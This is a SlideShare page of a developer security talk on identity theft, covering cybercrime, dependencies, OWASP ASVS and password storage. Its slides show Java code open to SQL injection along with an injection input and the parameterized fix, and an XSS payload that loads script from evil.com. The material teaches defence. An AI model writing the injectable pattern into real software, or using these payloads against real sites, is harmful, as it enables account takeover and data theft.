SlideShare a Scribd company logo

Identity theft blue4it nljug

Brian Vermeer
Brian Vermeer

identity theft: developer is key

Software
1 of 33
Download to read offline
Identity theft developer is key
Identity theft Cybercrime Hard to get rid of the consequences
 We create the code We protect the data
Are we part of the solution Or part of the problem?
Brian Vermeer Software Engineer
Cybercrime Real threat and it is growing Organised and professional it’s a business
 Risks are low We are not ready Lot of money involved
How profitable is cybercrime?
Identity theft Identity theft is the deliberate use of someone else's identity, usually as a method to gain a financial advantage or obtain credit and other benefits in the other person's name, and perhaps to the other person's disadvantage or loss. The person whose identity has been assumed may suffer adverse consequences if they are held responsible for the perpetrator's actions.
Kevin Goes (30) His identity data was stolen
 and then ….
Kevin Goes (30)
Data is like crude oil by itself it is dead, but comes to live when applying the right kind of science
What can we do as developers Protect yourself & be aware
Protect youself Where do I leave my notebook ? Where do I store my passwords ? Do I use my password multiple times ? Is my software up to date ? 2 step verification ? What wifi hotspot do I use ?
Software Development
Our application What we think it is What it actually is
How many dependencies? Are all needed? Are all up-to-date? Are all reliable? Dependencies
Don't trust blindly
Security as part of your development process business value VS security code reviews clean code = secure code
OWASP - ASVS Open Web Application Security Project Application Security Verification Standard https://www.owasp.org/index.php/ Category:OWASP_Application_Securit y_Verification_Standard_Project
Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = '" + newPassword + "' WHERE id=1";
 
 stmt.execute(sql);
Code review String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = '" + newPassword + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; ' UPDATE Users SET password =' '; ' WHERE id=1;
SQL Injection String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 Statement stmt = conn.createStatement();
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = '" + newPassword + "' WHERE id=1";
 
 stmt.execute(sql); what if my input = ' '; UPDATE Users SET password = ' ' UPDATE Users SET password =' '; UPDATE Users SET password = '' WHERE id=1;
Query Parameterization String url = "jdbc:postgresql://localhost:5432/test?user=brian&password=brian";
 Connection conn = DriverManager.getConnection(url);
 
 String newPassword = request.getParameter("password");
 String sql = "UPDATE Users SET password = ? WHERE id=1";
 
 PreparedStatement pstmt = conn.prepareStatement(sql);
 pstmt.setString(1, newPassword);
 pstmt.executeUpdate();
Password storage
Password protection Don’t store plain text Don’t limit the password length Don’t limit the character set Don’t use an ordinary hash function
Password protection Use a password policy Use a cryptographically strong credential-specific salt Use a cryptographic hash algorithm (e.g. PBKDF2) Use a HMAC (keyed-hash message authentication code), HMAC-SHA256 Design to be compromised
XSS (Cross Side Scripting) http://www.jfokus.se/saveComment?comment=Java+is+Awesome! <h3> Thank you for you comments! </h3> You wrote: <p/> Java is Awesome <p/>
XSS (Cross Site Scripting) http://www.jfokus.se/saveComment?comment=<script src="evil.com/ x.js"></script> <h3> Thank you for you comments! </h3> You wrote: <p/> <script src="evil.com/x.js"></script> <p/>
Summary BE AWARE Protect yourself Integrate security in development process https://www.owasp.org
 ASVS
Brian Vermeer @BrianVerm brian@brianvermeer.nl

Recommended

Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Brian Vermeer
 
Identity Theft : Developers are key
Identity Theft : Developers are keyIdentity Theft : Developers are key
Identity Theft : Developers are keyBrian Vermeer
 
Identity theft jfall17
Identity theft jfall17Identity theft jfall17
Identity theft jfall17Brian Vermeer
 
Identity theft: Developers are key - JavaZone17
Identity theft: Developers are key - JavaZone17Identity theft: Developers are key - JavaZone17
Identity theft: Developers are key - JavaZone17Brian Vermeer
 
Tales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersTales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersJaap Karan Singh
 
ExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityAlexander Benoit
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL AttacksAkash Mahajan
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 

Recommended

Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Identity theft: Developers are key - JFokus 2017
Identity theft: Developers are key - JFokus 2017Brian Vermeer
 
Identity Theft : Developers are key
Identity Theft : Developers are keyIdentity Theft : Developers are key
Identity Theft : Developers are keyBrian Vermeer
 
Identity theft jfall17
Identity theft jfall17Identity theft jfall17
Identity theft jfall17Brian Vermeer
 
Identity theft: Developers are key - JavaZone17
Identity theft: Developers are key - JavaZone17Identity theft: Developers are key - JavaZone17
Identity theft: Developers are key - JavaZone17Brian Vermeer
 
Tales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersTales of modern day data breaches - a web security guide for developers
Tales of modern day data breaches - a web security guide for developersJaap Karan Singh
 
ExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityExpertsLiveEurope The New Era Of Endpoint Security
ExpertsLiveEurope The New Era Of Endpoint SecurityAlexander Benoit
 
Believe It Or Not SSL Attacks
Believe It Or Not SSL AttacksBelieve It Or Not SSL Attacks
Believe It Or Not SSL AttacksAkash Mahajan
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Ömer Çıtak
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadvodQA
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Ömer Çıtak
 
#İstSec'17 Out of Band Sql Injection Attacks
#İstSec'17 Out of Band Sql Injection Attacks#İstSec'17 Out of Band Sql Injection Attacks
#İstSec'17 Out of Band Sql Injection AttacksBGA Cyber Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Web Security
Web SecurityWeb Security
Web SecurityAli Habeeb
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG PresentationDamon Cortesi
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
Web Security 101
Web Security 101Web Security 101
Web Security 101Michael Peters
 
Viruses, Biometrics, Encryption
Viruses, Biometrics, EncryptionViruses, Biometrics, Encryption
Viruses, Biometrics, Encryptionmonroel
 
How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingJarrod Overson
 
Big security for big data
Big security for big dataBig security for big data
Big security for big dataAri Elias-Bachrach
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
2600 Thailand #50 From 0day to CVE
2600 Thailand #50 From 0day to CVE2600 Thailand #50 From 0day to CVE
2600 Thailand #50 From 0day to CVEPongtorn Angsuchotmetee
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Paula Januszkiewicz
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.pptSul Haedir
 
Secure Code Warrior - Secure by default
Secure Code Warrior - Secure by defaultSecure Code Warrior - Secure by default
Secure Code Warrior - Secure by defaultSecure Code Warrior
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthnFIDO Alliance
 

More Related Content

What's hot

Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Ömer Çıtak
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadvodQA
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Ömer Çıtak
 
#İstSec'17 Out of Band Sql Injection Attacks
#İstSec'17 Out of Band Sql Injection Attacks#İstSec'17 Out of Band Sql Injection Attacks
#İstSec'17 Out of Band Sql Injection AttacksBGA Cyber Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 

What's hot (6)

Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)Out-of-band SQL Injection Attacks (#istsec)
Out-of-band SQL Injection Attacks (#istsec)
 
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkadVodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
 
Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)Out-of-band Sql Injection Attacks (#hacktrickconf)
Out-of-band Sql Injection Attacks (#hacktrickconf)
 
#İstSec'17 Out of Band Sql Injection Attacks
#İstSec'17 Out of Band Sql Injection Attacks#İstSec'17 Out of Band Sql Injection Attacks
#İstSec'17 Out of Band Sql Injection Attacks
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Web Security
Web SecurityWeb Security
Web Security
 

Similar to Identity theft blue4it nljug

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
 
Viruses, Biometrics, Encryption
Viruses, Biometrics, EncryptionViruses, Biometrics, Encryption
Viruses, Biometrics, Encryptionmonroel
 
How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingJarrod Overson
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Paula Januszkiewicz
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.pptSul Haedir
 
Secure Code Warrior - Secure by default
Secure Code Warrior - Secure by defaultSecure Code Warrior - Secure by default
Secure Code Warrior - Secure by defaultSecure Code Warrior
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthnFIDO Alliance
 
Typical Vulnerabilities of E-Banking Systems
Typical Vulnerabilities of E-Banking SystemsTypical Vulnerabilities of E-Banking Systems
Typical Vulnerabilities of E-Banking SystemsPositive Hack Days
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen? Claranet UK
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCiNPA Security SIG
 

Similar to Identity theft blue4it nljug (20)

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Viruses, Biometrics, Encryption
Viruses, Biometrics, EncryptionViruses, Biometrics, Encryption
Viruses, Biometrics, Encryption
 
How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019How Credential Stuffing is Evolving - PasswordsCon 2019
How Credential Stuffing is Evolving - PasswordsCon 2019
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is Evolving
 
Big security for big data
Big security for big dataBig security for big data
Big security for big data
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
2600 Thailand #50 From 0day to CVE
2600 Thailand #50 From 0day to CVE2600 Thailand #50 From 0day to CVE
2600 Thailand #50 From 0day to CVE
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
 
Owasp.meet up.2017.ppt
Owasp.meet up.2017.pptOwasp.meet up.2017.ppt
Owasp.meet up.2017.ppt
 
Secure Code Warrior - Secure by default
Secure Code Warrior - Secure by defaultSecure Code Warrior - Secure by default
Secure Code Warrior - Secure by default
 
Getting Started With WebAuthn
Getting Started With WebAuthnGetting Started With WebAuthn
Getting Started With WebAuthn
 
Null meet Code Review
Null meet Code ReviewNull meet Code Review
Null meet Code Review
 
Typical Vulnerabilities of E-Banking Systems
Typical Vulnerabilities of E-Banking SystemsTypical Vulnerabilities of E-Banking Systems
Typical Vulnerabilities of E-Banking Systems
 
How Does a Data Breach Happen?
How Does a Data Breach Happen? How Does a Data Breach Happen?
How Does a Data Breach Happen?
 
CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIs
 

More from Brian Vermeer

Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022Brian Vermeer
 
Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking Brian Vermeer
 
Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019Brian Vermeer
 
Writing better functional java code devnexus
Writing better functional java code devnexusWriting better functional java code devnexus
Writing better functional java code devnexusBrian Vermeer
 
Writing better functional java code - devnexus
Writing better functional java code - devnexusWriting better functional java code - devnexus
Writing better functional java code - devnexusBrian Vermeer
 
Common mistakes functional java snyk
Common mistakes functional java snykCommon mistakes functional java snyk
Common mistakes functional java snykBrian Vermeer
 
Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018Brian Vermeer
 
Common mistakes made with Functional Java
Common mistakes made with Functional JavaCommon mistakes made with Functional Java
Common mistakes made with Functional JavaBrian Vermeer
 
Common mistakes functional java devoxx
Common mistakes functional java devoxxCommon mistakes functional java devoxx
Common mistakes functional java devoxxBrian Vermeer
 
Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018Brian Vermeer
 
Common mistakes functional java vjug
Common mistakes functional java vjugCommon mistakes functional java vjug
Common mistakes functional java vjugBrian Vermeer
 
Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18Brian Vermeer
 
Ten common mistakes made in Function Java
Ten common mistakes made in Function JavaTen common mistakes made in Function Java
Ten common mistakes made in Function JavaBrian Vermeer
 
Ten common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java SummitTen common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java SummitBrian Vermeer
 
Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18Brian Vermeer
 
Ten mistakes functional java
Ten mistakes functional javaTen mistakes functional java
Ten mistakes functional javaBrian Vermeer
 
Java(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the UglyJava(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the UglyBrian Vermeer
 
Java8 tgtbatu javaone
Java8 tgtbatu javaoneJava8 tgtbatu javaone
Java8 tgtbatu javaoneBrian Vermeer
 
Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)Brian Vermeer
 

More from Brian Vermeer (20)

Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
Stranger Danger: Your Java Attack Surface Just Got Bigger | JBCNConf 2022
 
Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking Teqnation 19 - Live Hacking
Teqnation 19 - Live Hacking
 
Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019Don't be a trojan - Codemotion Amsterdam 2019
Don't be a trojan - Codemotion Amsterdam 2019
 
Writing better functional java code devnexus
Writing better functional java code devnexusWriting better functional java code devnexus
Writing better functional java code devnexus
 
Writing better functional java code - devnexus
Writing better functional java code - devnexusWriting better functional java code - devnexus
Writing better functional java code - devnexus
 
Common mistakes functional java snyk
Common mistakes functional java snykCommon mistakes functional java snyk
Common mistakes functional java snyk
 
Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018Don't be a trojan - Java2Days 2018
Don't be a trojan - Java2Days 2018
 
Common mistakes made with Functional Java
Common mistakes made with Functional JavaCommon mistakes made with Functional Java
Common mistakes made with Functional Java
 
Common mistakes functional java devoxx
Common mistakes functional java devoxxCommon mistakes functional java devoxx
Common mistakes functional java devoxx
 
Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018Common mistakes functional java | Oracle Code One 2018
Common mistakes functional java | Oracle Code One 2018
 
Common mistakes functional java vjug
Common mistakes functional java vjugCommon mistakes functional java vjug
Common mistakes functional java vjug
 
Don't be a Trojan
Don't be a TrojanDon't be a Trojan
Don't be a Trojan
 
Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18Ten common mistakes made with Functional Java JBCNConf18
Ten common mistakes made with Functional Java JBCNConf18
 
Ten common mistakes made in Function Java
Ten common mistakes made in Function JavaTen common mistakes made in Function Java
Ten common mistakes made in Function Java
 
Ten common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java SummitTen common mistakes made in Function Java - iSense Java Summit
Ten common mistakes made in Function Java - iSense Java Summit
 
Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18Java8 tgtbatu devoxxuk18
Java8 tgtbatu devoxxuk18
 
Ten mistakes functional java
Ten mistakes functional javaTen mistakes functional java
Ten mistakes functional java
 
Java(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the UglyJava(8) The Good, The Bad and the Ugly
Java(8) The Good, The Bad and the Ugly
 
Java8 tgtbatu javaone
Java8 tgtbatu javaoneJava8 tgtbatu javaone
Java8 tgtbatu javaone
 
Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)Java 8: the good, the bad and the ugly (JBCNConf 2017)
Java 8: the good, the bad and the ugly (JBCNConf 2017)
 

Recently uploaded

Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...harshavardhanraghave
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 

Recently uploaded (20)

Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
